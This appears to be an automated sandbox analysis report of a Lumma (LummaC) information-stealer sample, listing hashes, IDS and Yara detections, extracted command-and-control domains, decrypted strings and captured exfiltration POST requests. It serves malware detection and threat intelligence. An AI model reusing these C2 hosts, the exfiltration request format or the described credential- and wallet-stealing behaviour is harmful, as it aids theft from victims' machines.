Edit tour

Windows Analysis Report
RIMz2N1u5y.exe

Overview

General Information

Sample name:	RIMz2N1u5y.exe renamed because original name is a hash value
Original sample name:	0afffc327a38bdc6812b51507cacdcbe.exe
Analysis ID:	1580856
MD5:	0afffc327a38bdc6812b51507cacdcbe
SHA1:	be48f9c9d7c0b60207044719d2106e99b1b27f5b
SHA256:	a35b13603bd53856e24f0cdd8273b5a307d29b671cba0de80b3af85e4db6ed5a
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to read the PEB

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

RIMz2N1u5y.exe (PID: 4040 cmdline: "C:\Users\user\Desktop\RIMz2N1u5y.exe" MD5: 0AFFFC327A38BDC6812B51507CACDCBE)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["sustainskelet.lat", "rapeflowwj.lat", "crosshuaht.lat", "energyaffai.lat", "discokeyus.lat", "aspecteirs.lat", "grannyejh.lat", "erectystickj.click", "necklacebudi.lat"], "Build id": "yau6Na--8088441378"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
RIMz2N1u5y.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x4aad8:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x4e06e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000003.2338758204.00000000009C6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000000.2117748549.0000000000401000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000000.00000003.2217044597.0000000002A05000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Process Memory Space: RIMz2N1u5y.exe PID: 4040	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: RIMz2N1u5y.exe PID: 4040	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RIMz2N1u5y.exe PID: 4040	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.RIMz2N1u5y.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:08:11.096556+0100	2028371	3	Unknown Traffic	192.168.2.6	49713	172.67.154.166	443	TCP
2024-12-26T12:08:13.190867+0100	2028371	3	Unknown Traffic	192.168.2.6	49719	172.67.154.166	443	TCP
2024-12-26T12:08:15.669606+0100	2028371	3	Unknown Traffic	192.168.2.6	49725	172.67.154.166	443	TCP
2024-12-26T12:08:17.916143+0100	2028371	3	Unknown Traffic	192.168.2.6	49734	172.67.154.166	443	TCP
2024-12-26T12:08:20.350582+0100	2028371	3	Unknown Traffic	192.168.2.6	49740	172.67.154.166	443	TCP
2024-12-26T12:08:22.967197+0100	2028371	3	Unknown Traffic	192.168.2.6	49751	172.67.154.166	443	TCP
2024-12-26T12:08:26.133192+0100	2028371	3	Unknown Traffic	192.168.2.6	49757	172.67.154.166	443	TCP
2024-12-26T12:08:30.912448+0100	2028371	3	Unknown Traffic	192.168.2.6	49768	172.67.154.166	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:08:11.871049+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49713	172.67.154.166	443	TCP
2024-12-26T12:08:13.972552+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49719	172.67.154.166	443	TCP
2024-12-26T12:08:31.742077+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49768	172.67.154.166	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:08:11.871049+0100	2049836	1	A Network Trojan was detected	192.168.2.6	49713	172.67.154.166	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:08:13.972552+0100	2049812	1	A Network Trojan was detected	192.168.2.6	49719	172.67.154.166	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (erectystickj .click in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:08:11.096556+0100	2058531	1	Domain Observed Used for C2 Detected	192.168.2.6	49713	172.67.154.166	443	TCP
2024-12-26T12:08:13.190867+0100	2058531	1	Domain Observed Used for C2 Detected	192.168.2.6	49719	172.67.154.166	443	TCP
2024-12-26T12:08:15.669606+0100	2058531	1	Domain Observed Used for C2 Detected	192.168.2.6	49725	172.67.154.166	443	TCP
2024-12-26T12:08:17.916143+0100	2058531	1	Domain Observed Used for C2 Detected	192.168.2.6	49734	172.67.154.166	443	TCP
2024-12-26T12:08:20.350582+0100	2058531	1	Domain Observed Used for C2 Detected	192.168.2.6	49740	172.67.154.166	443	TCP
2024-12-26T12:08:22.967197+0100	2058531	1	Domain Observed Used for C2 Detected	192.168.2.6	49751	172.67.154.166	443	TCP
2024-12-26T12:08:26.133192+0100	2058531	1	Domain Observed Used for C2 Detected	192.168.2.6	49757	172.67.154.166	443	TCP
2024-12-26T12:08:30.912448+0100	2058531	1	Domain Observed Used for C2 Detected	192.168.2.6	49768	172.67.154.166	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (erectystickj .click)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:08:09.463786+0100	2058530	1	Domain Observed Used for C2 Detected	192.168.2.6	60443	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:08:16.517651+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	49725	172.67.154.166	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://erectystickj.click/apiPr39	Avira URL Cloud: Label: malware
Source: https://erectystickj.click/1E	Avira URL Cloud: Label: malware
Source: https://erectystickj.click/apiY	Avira URL Cloud: Label: malware
Source: https://erectystickj.click/QE	Avira URL Cloud: Label: malware
Source: https://erectystickj.click/apiNGI	Avira URL Cloud: Label: malware
Source: https://erectystickj.click/	Avira URL Cloud: Label: malware
Source: https://erectystickj.click/QD	Avira URL Cloud: Label: malware
Source: https://erectystickj.click	Avira URL Cloud: Label: malware
Source: https://erectystickj.click/apidb	Avira URL Cloud: Label: malware
Source: https://erectystickj.click/apiWine9	Avira URL Cloud: Label: malware
Source: https://erectystickj.click/apiL	Avira URL Cloud: Label: malware
Source: https://erectystickj.click:443/api	Avira URL Cloud: Label: malware
Source: https://erectystickj.click/api1wq#	Avira URL Cloud: Label: malware
Source: https://erectystickj.click/apip	Avira URL Cloud: Label: malware
Source: https://erectystickj.click/api	Avira URL Cloud: Label: malware
Source: erectystickj.click	Avira URL Cloud: Label: malware
Source: https://erectystickj.click/rl#	Avira URL Cloud: Label: malware
Source: https://erectystickj.click/apisT	Avira URL Cloud: Label: malware

Found malware configuration

Source: RIMz2N1u5y.exe.4040.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["sustainskelet.lat", "rapeflowwj.lat", "crosshuaht.lat", "energyaffai.lat", "discokeyus.lat", "aspecteirs.lat", "grannyejh.lat", "erectystickj.click", "necklacebudi.lat"], "Build id": "yau6Na--8088441378"}

Multi AV Scanner detection for submitted file

Source: RIMz2N1u5y.exe	Virustotal: Detection: 44%			Perma Link
Source: RIMz2N1u5y.exe	ReversingLabs: Detection: 60%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 95.5% probability

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp	String decryptor: rapeflowwj.lat
Source: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp	String decryptor: crosshuaht.lat
Source: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp	String decryptor: sustainskelet.lat
Source: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp	String decryptor: aspecteirs.lat
Source: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp	String decryptor: energyaffai.lat
Source: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp	String decryptor: necklacebudi.lat
Source: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp	String decryptor: discokeyus.lat
Source: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp	String decryptor: grannyejh.lat
Source: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp	String decryptor: erectystickj.click
Source: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp	String decryptor: yau6Na--8088441378

Source: RIMz2N1u5y.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.6:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.6:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.6:49768 version: TLS 1.2

Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then mov esi, ecx	0_2_0088A084
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then test eax, eax	0_2_008A80DC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then push eax	0_2_008A80DC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-2DE6A924h]	0_2_008AF07C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+06h]	0_2_0087E07F
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+1Dh]	0_2_0089E1A4
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-28DB6A02h]	0_2_0089E1A4
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then mov ecx, eax	0_2_008861E8
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx]	0_2_0089412C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then mov byte ptr [edx], al	0_2_0089C2C9
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then movzx edi, byte ptr [ecx]	0_2_0088B26C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+78h]	0_2_0088B26C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+1Ch]	0_2_0089726C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+1B4BB045h]	0_2_0089726C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then mov byte ptr [edx], al	0_2_0089C261
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then mov word ptr [edi], ax	0_2_0088E36C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ebx+0Ah]	0_2_0088E36C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then mov esi, edx	0_2_0087E434
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edx-0000009Bh]	0_2_008AA44C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then mov word ptr [ebp+00h], ax	0_2_008965EA
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	0_2_008AE5EC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_0089A57C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+6BC763FCh]	0_2_0089068C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then mov ecx, ebx	0_2_00898695
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+edx+00h]	0_2_0087460C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then jmp eax	0_2_00899628
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+08h]	0_2_008A763C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then mov eax, edx	0_2_008A763C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then mov ebx, eax	0_2_008A763C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-6Fh]	0_2_008A763C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+esi]	0_2_008747EC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then mov ecx, eax	0_2_00888760
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then mov word ptr [edx], cx	0_2_0088A893
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then jmp eax	0_2_008988DC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], AF697AECh	0_2_008AC8ED
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then jmp eax	0_2_008988E1
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then mov ecx, eax	0_2_0087F827
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then mov edx, ecx	0_2_0087F827
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-78168CD7h]	0_2_008AA9AC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+1Dh]	0_2_0089C9E1
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-28DB6A02h]	0_2_0089C9E1
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then mov byte ptr [edi], bl	0_2_0087AA8C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then mov esi, eax	0_2_0088AAB0
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then mov ecx, eax	0_2_008ABA6C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then jmp eax	0_2_0087DA6E
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+1Ch]	0_2_008ACBD6
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then cmp byte ptr [esi+eax], 00000000h	0_2_0089AB0C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-24B7157Ah]	0_2_008ACB6C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+2376781Ah]	0_2_0088DC86
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then mov ebx, eax	0_2_0087ACEC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then mov esi, ecx	0_2_00894CFC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then mov ecx, eax	0_2_00886DE2
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-0000008Fh]	0_2_008AADFC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_008A4D7C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+000000A8h]	0_2_0089CD70
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then cmp word ptr [edx+eax], 0000h	0_2_00890EC8
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then mov eax, dword ptr [edi+0Ch]	0_2_00873EFC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+1Dh]	0_2_0089BE62
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-28DB6A02h]	0_2_0089BE62
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then cmp word ptr [edi+ecx], 0000h	0_2_0088DF82
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_00878FEC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_00878FEC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0087BFE8
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then mov ecx, eax	0_2_0087FF1D
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then mov ecx, eax	0_2_0087FEEC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh	0_2_00895F6C

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058530 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (erectystickj .click) : 192.168.2.6:60443 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058531 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (erectystickj .click in TLS SNI) : 192.168.2.6:49713 -> 172.67.154.166:443
Source: Network traffic	Suricata IDS: 2058531 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (erectystickj .click in TLS SNI) : 192.168.2.6:49725 -> 172.67.154.166:443
Source: Network traffic	Suricata IDS: 2058531 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (erectystickj .click in TLS SNI) : 192.168.2.6:49734 -> 172.67.154.166:443
Source: Network traffic	Suricata IDS: 2058531 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (erectystickj .click in TLS SNI) : 192.168.2.6:49757 -> 172.67.154.166:443
Source: Network traffic	Suricata IDS: 2058531 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (erectystickj .click in TLS SNI) : 192.168.2.6:49751 -> 172.67.154.166:443
Source: Network traffic	Suricata IDS: 2058531 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (erectystickj .click in TLS SNI) : 192.168.2.6:49768 -> 172.67.154.166:443
Source: Network traffic	Suricata IDS: 2058531 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (erectystickj .click in TLS SNI) : 192.168.2.6:49740 -> 172.67.154.166:443
Source: Network traffic	Suricata IDS: 2058531 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (erectystickj .click in TLS SNI) : 192.168.2.6:49719 -> 172.67.154.166:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49713 -> 172.67.154.166:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49713 -> 172.67.154.166:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49768 -> 172.67.154.166:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49725 -> 172.67.154.166:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49719 -> 172.67.154.166:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49719 -> 172.67.154.166:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: sustainskelet.lat
Source: Malware configuration extractor	URLs: rapeflowwj.lat
Source: Malware configuration extractor	URLs: crosshuaht.lat
Source: Malware configuration extractor	URLs: energyaffai.lat
Source: Malware configuration extractor	URLs: discokeyus.lat
Source: Malware configuration extractor	URLs: aspecteirs.lat
Source: Malware configuration extractor	URLs: grannyejh.lat
Source: Malware configuration extractor	URLs: erectystickj.click
Source: Malware configuration extractor	URLs: necklacebudi.lat

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49713 -> 172.67.154.166:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49757 -> 172.67.154.166:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49734 -> 172.67.154.166:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49725 -> 172.67.154.166:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49768 -> 172.67.154.166:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49751 -> 172.67.154.166:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49740 -> 172.67.154.166:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49719 -> 172.67.154.166:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: erectystickj.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: erectystickj.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6K367U80M9EVNI7XABUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12864Host: erectystickj.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WZ7WKDKFL68XCI2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15092Host: erectystickj.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HX79JK73JADHZ16User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19950Host: erectystickj.click
